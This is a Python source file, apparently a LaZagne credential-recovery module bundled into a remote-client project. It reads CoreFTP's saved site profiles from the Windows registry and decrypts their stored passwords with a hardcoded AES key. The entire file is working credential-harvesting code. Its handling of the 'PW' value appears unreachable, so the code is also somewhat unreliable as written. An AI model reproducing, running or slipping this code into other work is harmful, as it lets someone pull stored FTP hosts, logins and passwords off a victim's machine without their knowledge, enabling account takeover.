blob: cccfffacfd609a217a3914cd3e6ab7e358c03e8b (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
|
# -*- coding: utf-8 -*-
import binascii
try:
import _winreg as winreg
except ImportError:
import winreg
from foreign.client_handling.lazagne.config.crypto.pyaes.aes import AESModeOfOperationECB
from foreign.client_handling.lazagne.config.module_info import ModuleInfo
from foreign.client_handling.lazagne.config.winstructure import OpenKey, HKEY_CURRENT_USER
class CoreFTP(ModuleInfo):
def __init__(self):
ModuleInfo.__init__(self, 'coreftp', 'sysadmin')
self._secret = "hdfzpysvpzimorhk"
def decrypt(self, hex):
encoded = binascii.unhexlify(hex)
aes = AESModeOfOperationECB(self._secret)
decrypted = aes.decrypt(encoded)
return decrypted.split('\x00')[0]
def run(self):
key = None
pwd_found = []
try:
key = OpenKey(HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites')
except Exception as e:
self.debug(str(e))
if key:
num_profiles = winreg.QueryInfoKey(key)[0]
elements = ['Host', 'Port', 'User', 'Password']
for n in range(num_profiles):
name_skey = winreg.EnumKey(key, n)
skey = OpenKey(key, name_skey)
num = winreg.QueryInfoKey(skey)[1]
values = {}
for nn in range(num):
k = winreg.EnumValue(skey, nn)
if k[0] in elements:
if k[0] == 'User':
values['Login'] = k[1]
pwd_found.append(values)
if k[0] == 'PW':
try:
values['Password'] = self.decrypt(k[1])
except Exception as e:
self.debug(str(e))
else:
values[k[0]] = k[1]
winreg.CloseKey(skey)
winreg.CloseKey(key)
return pwd_found
|